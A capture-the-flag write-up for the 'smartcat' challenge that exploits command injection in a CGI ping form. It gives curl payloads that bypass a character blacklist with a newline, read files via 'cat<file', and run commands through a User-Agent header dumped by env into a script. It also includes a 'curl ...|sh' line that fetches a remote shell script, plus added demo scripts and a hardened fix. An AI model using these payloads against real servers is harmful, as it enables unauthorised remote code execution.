smartcat - Writeup by Maxima

Challenge

Damn it, that stupid smart cat litter is broken again

Now only the debug interface is available here and this stupid thing only permits one ping to be sent!

I know my contract number is stored somewhere on that interface but I can't find it and this is the only available page! Please have a look and get this info for me!

FYI: No need to brute-force anything there. If you do, you'll be banned permanently.

http://smartcat.insomnihack.ch/cgi-bin/index.cgi

Solution

The web interface lets you ping a domain name. This is the textbook case of command injection: we can guess that the server runs something like ping -c 1 $dest through a shell, so injecting a command separator should let us run a second command of our own. I first tried:

google.com; ls
google.com | ls

Both came back with a Bad character error, so some characters are blacklisted. The newline (\n, sent as %0A in the URL-encoded body) turned out not to be, and for sh a newline separates commands just as ; does. The space seems to be blocked as well, so the injected command has to be space-free:

curl 'http://smartcat.insomnihack.ch/cgi-bin/index.cgi' -d 'dest=google.com%0Als'

That is nice! I also noticed that the input redirection <, which is not blacklisted, reads a file without needing a space (cat<file instead of cat file), so the content of a file can be displayed with:

curl 'http://smartcat.insomnihack.ch/cgi-bin/index.cgi' -d 'dest=google.com%0Acat<index.cgi'
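To make the bypass concrete, here is an added example (not the challenge's cgi-bin script, which was never published, and not the author's code): a stand-in ping form written in sh that blacklists the usual separators and the space but not the newline or <, beside a hardened version. The ping stub function, the eval-based re-parsing and the target file are constructed for the demo; a real CGI calling system() or sh -c behaves the same way, since the string is re-parsed by a shell either way.

```shell
#!/bin/sh
# Added example, not the challenge's real cgi-bin script (never published):
# a stand-in ping form that blacklists the usual separators but not the
# newline or "<", next to a hardened version. ping is replaced by a
# constructed stub function so the example runs offline.

ping() { echo "PING $3 (stub)"; }            # stands in for: ping -c 1 <host>
TARGET=$(mktemp)                              # constructed file to leak
echo 'you have been injected' > "$TARGET"

# Vulnerable: rejects ; | & space ` $ ( ) and then re-parses the string
# with eval, which is what system() / sh -c do as well. sh also treats a
# newline as a command separator, and "<" lets cat read a file without
# a space, so the blacklist does not help.
vulnerable_ping() {
    dest=$1
    if printf '%s' "$dest" | grep -q '[;|& `$()]'; then
        echo 'Bad character'
        return 1
    fi
    eval "ping -c 1 $dest"
}

# Hardened: allow-list the hostname shape (letters, digits, dot, dash,
# no leading dash, hence no newline or redirection either) and never
# let the value reach a shell parser again.
hardened_ping() {
    dest=$1
    case $dest in
        ''|-*|*[!A-Za-z0-9.-]*)
            echo 'Invalid host'
            return 1 ;;
    esac
    ping -c 1 "$dest"
}

# Constructed payload: the writeup's newline + cat<file trick, aimed at TARGET.
PAYLOAD=$(printf 'google.com\ncat<%s' "$TARGET")

vulnerable_ping 'google.com; ls' || true    # Bad character
vulnerable_ping "$PAYLOAD"                  # PING google.com (stub), then the file
hardened_ping "$PAYLOAD" || true            # Invalid host
hardened_ping google.com                    # PING google.com (stub)
```

The grep-based check mirrors what the challenge's error suggests: it looks for forbidden bytes per line, so a payload split across lines by \n never contains one. The hardened version does not try to enumerate bad characters at all; it accepts only what a hostname can look like and passes the value as a single argv element.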

The next step is to get a shell. The plan was sh</tmp/myfile, which runs a script from a file without a space, but I first needed a way to write shell code into that file while the POST body stays space-free. The env command, which prints every environment variable, turned out to be the way:

curl 'http://smartcat.insomnihack.ch/cgi-bin/index.cgi' -d 'dest=google.com%0Aenv'

Because the script runs under CGI, the request headers arrive as environment variables (HTTP_USER_AGENT, QUERY_STRING, and so on), and we fully control their values; the blacklist is only applied to the dest parameter. The User-Agent header can therefore carry a shell command:

curl 'http://smartcat.insomnihack.ch/cgi-bin/index.cgi?xxx' -A 'xxx echo Powned; exit 0' -d 'dest=google.com%0Aenv'

It returns:

CONTENT_TYPE=application/x-www-form-urlencoded
GATEWAY_INTERFACE=CGI/1.1
REMOTE_ADDR=89.234.156.87
QUERY_STRING=xxx
HTTP_USER_AGENT=xxx echo Powned; exit 0
[...]

Every line env prints before HTTP_USER_AGENT is a plain NAME=value assignment, which sh accepts, and the HTTP_USER_AGENT line itself parses as an assignment prefix (HTTP_USER_AGENT=xxx) followed by the commands echo Powned; exit 0. The dump is therefore a well-formed shell script, and the exit 0 stops sh before it reaches anything printed after the payload. So redirect env into a file, feed that file to sh with <, and whatever is in the User-Agent runs, without a single blacklisted character in the POST body:

curl 'http://smartcat.insomnihack.ch/cgi-bin/index.cgi?xxx' -A 'xxx echo Powned; exit 0' -d 'dest=google.com%0Aenv>/tmp/pony7%0Ash</tmp/pony7'
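The reason this works can be reproduced locally. The added example below is not part of the original writeup: it dumps a constructed CGI-style environment with env and feeds it to sh the way the exploit did. Only the User-Agent payload is the page's; every other variable name and value is made up for the demo. It also shows the caveat that matters in practice: every line env prints before HTTP_USER_AGENT must itself parse as sh, and a value such as Apache/2.4 (Debian) appearing earlier in the dump aborts sh before the payload line is reached.

```shell
#!/bin/sh
# Added example, not from the original writeup: why `env > f; sh < f`
# executes the User-Agent header. Variable names and values are
# constructed; only the User-Agent payload is the page's.

# run_env_as_script NAME=value ...: build an environment holding exactly
# the given variables (env -i starts from an empty one, and the variables
# come out in the order they were set here), dump it with env(1) to a
# file, then feed that file to sh exactly as the exploit did.
run_env_as_script() {
    dump=$(mktemp)
    env -i "$@" /usr/bin/env > "$dump"
    sh < "$dump" 2>&1
    rm -f "$dump"
}

# The User-Agent from the writeup. sh reads the dumped line
#   HTTP_USER_AGENT=xxx echo Powned; exit 0
# as an assignment prefix followed by two commands.
UA='xxx echo Powned; exit 0'

# Good case: every line before HTTP_USER_AGENT is a plain NAME=value
# assignment, which sh accepts; `exit 0` then stops sh before it reaches
# SERVER_SOFTWARE, whose value would not parse.
good_case() {
    run_env_as_script \
        CONTENT_TYPE=application/x-www-form-urlencoded \
        GATEWAY_INTERFACE=CGI/1.1 \
        QUERY_STRING=xxx \
        HTTP_USER_AGENT="$UA" \
        SERVER_SOFTWARE='Apache/2.4 (Debian)'
}

# Bad case: the same unparseable value comes first. `Apache/2.4 (Debian)`
# is a syntax error, and a non-interactive sh exits on a syntax error,
# so the payload line is never executed.
bad_case() {
    run_env_as_script \
        SERVER_SOFTWARE='Apache/2.4 (Debian)' \
        HTTP_USER_AGENT="$UA"
}

echo '--- good case ---'; good_case          # prints: Powned
echo '--- bad case ---';  bad_case || true   # prints only a syntax error
```

When reusing this trick elsewhere, the thing to check first is therefore the raw env output: any variable printed above HTTP_USER_AGENT whose value contains shell metacharacters (parentheses, quotes, unbalanced backticks) has to be neutralised, for example by choosing a header whose variable sorts or is set earlier, before the payload can be reached.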

Now it's easy to get the first flag:

find .
cat there/is/your/flag/or/maybe/not/what/do/you/think/really/please/tell/me/seriously/though/here/is/the/flag

For the second flag, I used curl arthaud.me/sh|sh, where the script hosted on my own server gives me a real shell back. Then:

$ /home/smartcat/readflag
Almost there... just trying to make sure you can execute arbitrary commands....
Write 'Give me a...' on my stdin, wait 2 seconds, and then write '... flag!'.
Do not include the quotes. Each part is a different line.
$ (echo "Give me a..."; sleep 2; echo "... flag!"; cat) | /home/smartcat/readflag
Flag: 
            ___
        .-"; ! ;"-.
      .'!  : | :  !`.
     /\  ! : ! : !  /\
    /\ |  ! :|: !  | /\
   (  \ \ ; :!: ; / /  )
  ( `. \ | !:|:! | / .' )
  (`. \ \ \!:|:!/ / / .')
   \ `.`.\ |!|! |/,'.' /
    `._`.\\\!!!// .'_.'
       `.`.\\|//.'.'
        |`._`n'_.'|  hjw
        "----^----"

INS{shells_are _way_better_than_cats}

Author

Maxime Arthaud 2016/01/17 21:56

ctf/public/insomnihack-teaser/smartcat.txt · Last modified: 2016/10/15 20:11 by arthaum